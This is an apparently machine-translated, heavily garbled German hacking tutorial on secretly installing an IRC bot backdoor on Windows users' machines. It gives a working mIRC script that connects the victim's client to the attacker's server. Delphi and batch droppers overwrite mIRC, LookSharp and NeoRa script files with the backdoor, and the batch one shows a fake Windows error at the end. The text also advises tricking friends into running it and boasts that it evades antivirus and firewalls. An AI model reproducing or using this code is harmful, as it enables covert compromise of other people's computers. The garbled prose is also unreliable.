Wir hängen bot unter Windows.



1. Intro.
2. Trojaner.
3. mIRC - Skripte.
I. schreiben das Skript Backdoor
II. delphi schreiben auf ein Programm, das eine Backdoor in den Feind einsetzen wird mIRC
III. batch'ah schreiben auf ein Programm, das eine Backdoor in den Feind einsetzen wird mIRC
IV. Sozio-Engineering: vparivayut prog =)
4. Beide Methoden verglichen.
5. Wie um sich zu schützen.
6. Outro.

1. In unserer Zeit, darunter beliebte Kanäle Besitzer, ist es Mode geworden chanely ein Dutzend Boote mit verschiedenen Linux - shell'ov zu hängen , für, so, "Sicherheitskanal." Zu sprechen Natürlich, ich habe nichts gegen jede eggdrop'ov da, aber wie ein Sterblicher Benutzer zu sein, die weder die Schale noch cc oder Wissen (wie die Elite des Kanals # 31337 auf dem Server irc.dal.net.ru haben =)? Also in diesem Artikel werde ich Ihnen zeigen, wie ein Bot auf einer Maschine mit Win-wie OSes aufzuhängen.
IMHO, gibt es nur zwei Möglichkeiten, dies zu erreichen: Trojaner und Trojaner =) Beginnen wir mit dem ersten Start.

2. Wenn Sie vor dem Schließen (irc.msn.com) zu MSNE waren, ist es wahrscheinlich Zeit , um die n-nym Anzahl von CMV - Bots auf #russian_chat Kanäle, #russian_girls, #russian_andybig und so weiter genießen. So ist diese Bots nicht eggdrop'y. Das heißt, SubSeven'y. Ich hörte von diesem Pferd? Sub7 Trojan nur in meinem Gedächtnis, die remoten IRC-Bot hängen können (ich habe nicht yuzal Trojaner, also nicht wissen, ob er Analoga kam). So schütteln Sub'a hier und genießen. Diejenigen, die nicht daran gewöhnt sind zu suchen nach einfachen Möglichkeiten, weiter zu lesen.

3. Chancen mIRC-Skripte oochen sogar beeindruckend. Schreiben Sie sie auf dem gleichen CGI-Scanner Lappalie, nicht die vereinfach bot zu erwähnen. Nehmen wir zum Beispiel WarSatan Skript. Sie baute nur eine "einfache Roboter". Wenn Sie mit Ihrem Lieblings-IRC-Server verbinden Skript eine Verbindung zum Server Gastbenutzer vorbei und bekommt irc.webchat.org es auf #CHATOP Kanäle, #MEKAH und #PANGKOR. Das ist der ganze Mechanismus funktioniert. Unsere Aufgabe - die gleiche einfache Backdoor wie Mirko Plugin zu schreiben.
I. Haibolee wichtige Linien äußern.

on 1:CONNECT:{
;#открываем соединение с твоим irc cервером
.sockopen 31337 irc_сервер его_порт
}
on 1:DISCONNECT:{
;#при разрыве соединения убиваем сокет
.sockclose 31337
}
on 1:SOCKOPEN:31337:{
;#авторизуемся на irc-сервере
.sockwrite -n $sockname USER BOT "" "localhost" :Satanic bot
.sockwrite -n $sockname NICK ник_бота $+ $r(1,999)
;#заходим на твой канал
.sockwrite -n $sockname join твой_канал
}
on 1:SOCKREAD:31337:{
;#этот скрипт автоматически отвечает на серверный ping
;#без него сервер будет кидать бота, потому что тот не отвечает на пинги
.sockread %tmp
if ($gettok(%tmp,1,32) == ping) {
.sockwrite -n $sockname PONG $gettok(%tmp,2-,32)
}
}


Entfernen Sie die Kommentare, wir ihre Werte ersetzen, die Anzahl der Zeilen (kopieren Sie sie einfach alle mIRC-Editor und speichern Sie es - er alles-Zahlen hatte) und speichern Sie die resultierende Datei in control.dll.
Backdoor sich bereit. Jetzt müssen wir es in anderen script.ini einfügen.

II. Hier auf delphi Quellcode eines Programms, das script.ini Datei und, wenn sie erfolgreich sind Ergebnis der Suche zu schrauben sucht, ersetzt sie unser.

Wichtig! Control.dll sollte mit diesem prog im gleichen Verzeichnis gespeichert werden.

program Project1;

uses
SysUtils,
windows,
shellapi;


const search = 'script.ini'; //файл который нужно найти и заменить
replace = 'control.dll'; //файл, которым надо заменить, должен быть
// в том же месте откуда запуститься эта прога =)


var buf: array [0..255] of char;
fl: PChar;
flag:boolean = false;

//процедура замены файлов
procedure Change(where:pchar);

function CopyFile(FromFile, ToDir : string) : boolean; //функция копирования
var F : TShFileOpStruct;
begin
F.Wnd := 0; F.wFunc := FO_COPY;
FromFile:=FromFile+#0; F.pFrom:=pchar(FromFile);
ToDir:=ToDir+#0; F.pTo:=pchar(ToDir);
F.fFlags := FOF_ALLOWUNDO or FOF_NOCONFIRMATION or FOF_SILENT;
{$I-}
result:=ShFileOperation(F) = 0;
{$I+}
end;

begin
DeleteFile(where);
CopyFile(replace,where)
end;


//процедура глоб. поиска
function Find(DirN: string):boolean;
var
tsr: TSearchRec;
Full: string;

begin
find:=false;
if FindFirst(DirN + '\*.*', faAnyFile, tsr) = 0 then
repeat
if (tsr.Name = '.') or (tsr.Name = '..') then continue;
Full:= DirN + '\' + tsr.Name;
if tsr.Attr = faDirectory then //если каталог
Find(Full);
until (FindNext(tsr) <>0)or(tsr.Name = search)or flag;

if tsr.Name = search //если нашли
then begin
find:=true;
flag:=true;
Change(pchar(DirN+'\'+tsr.Name));
end;

end;


//Основной блок программы
begin
if SearchPath(nil,search,nil,sizeof(buf),buf,fl)>0 then
Change(buf)
else
begin
Find('c:');
// если надо и на других дисках искать то можешь сделать так:
// if Not Find('c:') then
// if Not Find('d:') then
// if Not Find('e:') then
//etc....
end;

end.


III. Wenn Sie nicht mit der alten Codierung beschäftigt sind und cha wirft in Hefe aus dem Wort "Compiler", lassen Sie uns ein Programm auf batch'ah schreiben.

echo off
cls
if exist mirc.ini goto in_the_same_dir
if exist c:\mirc\MIRC.INI set mirc=c:\mirc
if exist c:\mirc\mirc\MIRC.INI set mirc=c:\mirc\mirc
if exist c:\irc\MIRC.INI set mirc=c:\irc
if exist c:\irc\mirc\MIRC.INI set mirc=c:\irc\mirc
if exist c:\chat\mirc\MIRC.INI set mirc=c:\chat\mirc
if exist c:\chat\MIRC.INI set mirc=c:\chat
if exist c:\progra~1\mirc\MIRC.INI set mirc=c:\progra~1\mirc
if exist c:\chat\looksharp\MIRC.INI set look=c:\chat\looksharp
if exist c:\mirc\looksharp\MIRC.INI set look=c:\mirc\looksharp
if exist c:\irc\looksharp\MIRC.INI set look=c:\irc\looksharp
if exist c:\progra~1\looksharp\MIRC.INI set look=c:\progra~1\looksharp
if exist c:\progra~1\trion\MIRC.INI set neo=c:\progra~1\trion
if exist c:\progra~1\neo-ra\MIRC.INI set neo=c:\progra~1\neo-ra
if exist c:\progra~1\NeoRa\Trion\MIRC.INI set neo=c:\progra~1\NeoRa\Trion
if exist c:\progra~1\NeoRa\MIRC.INI set neo=c:\progra~1\NeoRa
if exist c:\chat\NeoRa\MIRC.INI set neo=c:\chat\NeoRa
if exist c:\irc\NeoRa\MIRC.INI set neo=c:\irc\NeoRa
if exist c:\chat\neo-ra\MIRC.INI set neo=c:\chat\neo-ra
if exist c:\irc\neo-ra\MIRC.INI set neo=c:\irc\neo-ra
if exist c:\chat\Trion\MIRC.INI set neo=c:\chat\Trion
if exist c:\irc\Trion\MIRC.INI set neo=c:\irc\Trion
if exist c:\Trion\MIRC.INI set neo=c:\Trion
if exist c:\NeoRa\MIRC.INI set neo=c:\NeoRa
if exist c:\Neo-ra\MIRC.INI set neo=c:\Neo-ra
if exist d:\chat\NeoRa\MIRC.INI set neo_here=d:\chat\NeoRa
if exist d:\irc\NeoRa\MIRC.INI set neo_here=d:\irc\NeoRa
if exist d:\chat\neo-ra\MIRC.INI set neo_here=d:\chat\neo-ra
if exist d:\irc\neo-ra\MIRC.INI set neo_here=d:\irc\neo-ra
if exist d:\chat\Trion\MIRC.INI set neo_here=d:\chat\Trion
if exist d:\irc\Trion\MIRC.INI set neo_here=d:\irc\Trion
if exist d:\Trion\MIRC.INI set neo=d:\Trion
if exist d:\NeoRa\MIRC.INI set neo=d:\NeoRa
if exist d:\Neo-ra\MIRC.INI set neo=d:\Neo-ra
if exist d:\mirc\MIRC.INI set mirc=d:\mirc
if exist d:\mirc\mirc\MIRC.INI set mirc=d:\mirc\mirc
if exist d:\irc\MIRC.INI set mirc=d:\irc
if exist d:\irc\mirc\MIRC.INI set mirc=d:\irc\mirc
if exist d:\chat\mirc\MIRC.INI set mirc=d:\chat\mirc
if exist d:\chat\MIRC.INI set mirc=d:\chat
if exist d:\looksharp\MIRC.INI set look=d:\looksharp
if exist d:\chat\looksharp\MIRC.INI set look=d:\chat\looksharp
if exist d:\mirc\looksharp\MIRC.INI set look=d:\mirc\looksharp
if exist d:\irc\looksharp\MIRC.INI set look=d:\irc\looksharp
if "%mirc%"=="" goto no_mirc
deltree /y %mirc%\script.ini
copy control.dll %mirc%\script.ini
cls
:no_mirc
if "%look%"=="" goto no_look
deltree /y %look%\System\lookevents04.sys
copy control.dll %look%\System\lookevents04.sys
cls
:no_look
if "%neo%"=="" goto end
deltree /y %neo%\root\trionscr7.ini
copy control.dll %neo%\root\trionscr7.ini
cls
goto end
:in_the_same_dir
deltree /y script.ini
copy control.dll script.ini
:end
echo Your Microsoft Windows is not correctly installed.
echo Pleas re-install it and try again

Dieses Kanu zufällig sucht mIRC, Neora Trion und Looksharp. Die Wahrscheinlichkeit, eine ziemlich unbedeutend zu finden, so ist es ratsam, auf das Thema vorherrschen diese Datei zusammen in einem Ordner mit dem IRC-Client mit control.dll zu setzen. Bei einem erfolgreichen Abschluss der Suche, ersetzt die Datei ein Fremd script.ini unsere control.dll.
Wandeln Sie diese bat'nik in exe'shnik einige bat2exec'om und können Ihre Freunde vparivat.

IV. Ich denke, es ist nicht für mich, Ihnen zu erzählen, wie "vparivat" jemand exe'shnik. Ich möchte nur ein Merkmal zu betonen. Gib es zu, bitte führen Sie Ihre exe'shnik vyzyvet Verdächtiger auch die engstirnigen Benutzer. So können Sie den anderen Weg gehen. Um dies zu tun, gehen Sie zurück ist I. Schritt nicht Zeilen des Skripts nummeriert, nur schieben es in joke.mrc Datei. Alles. geben es jetzt weg an Ihre Freunde mit den Worten: legen Sie sie in das Verzeichnis mit Ihrer kleinen Welt, geben Sie in die Konsole "/ Last -rs joke.mrc" und genießen Sie alle Freuden des Plugins =)

4. Und ja, was ist die Methode script.ini besser zu ersetzen?
1) nicht durch Antivirus erwischt
2) nicht gefangen FairWall'ami. Ich denke, dass viele Menschen auf einmal mit dem Schaum aus dem Mund wird beweisen, dass Zonealarm und AtGuard oberegut sie davon ab. Das Besondere an ihnen, wenn mIRC in diesen beiden fairvol als erlaubt Server \ Client registriert erklären, dann auch die PV-piknet wenn eine Backdoor-Verbindung zu öffnen.
3) es ist schwierig zu finden \ töten sogar ein erfahrener Benutzer

5. Jetzt darüber , wie sie sich schützen können . , Sofort gehen Sie zum zweiten: Auch hier werde ich nicht ein Weg (AVP + Zonealarm, weil ihm alles klar ist) zu Sub7'om betrachtet werden.
Um festzustellen, sollte das Backdoor-Skript einige mIRC Plugin vrodi IPSearch'a verwenden, die auf dem Server des Benutzers mit dem gleichen Ipomoea wie Ihre aussehen würde. Wenn es eine ist, bedeutet es, jemand eindeutig auf Sie bot aufgehängt. Wenn diese nicht gefunden wird, dann das Boot oder auf einem anderen Server, oder sind Sie sauber.
Auch für den Nachweis von Bot können Sie die gleiche ZAlarm verwenden: im Moment die größten IRC-Server, überprüfen Sie alle Clients auf den Proxy. Auf welche Weise? Ein einfacher Port-Scan. Also, wenn Sie an den Server irc.some.com verbinden, ein Port an cha jede irc.lame.com durchsucht, es lohnt zadumkatsya ...
Wie die Backdoor zu töten? Wenn Sie das Scripting nicht verstehen, installieren Sie einfach den IRC-Client.

6. Was kann am Ende gesagt werden? Nicht yuzayte unbekannte Skripte und andere nicht zwingen, es zu tun =)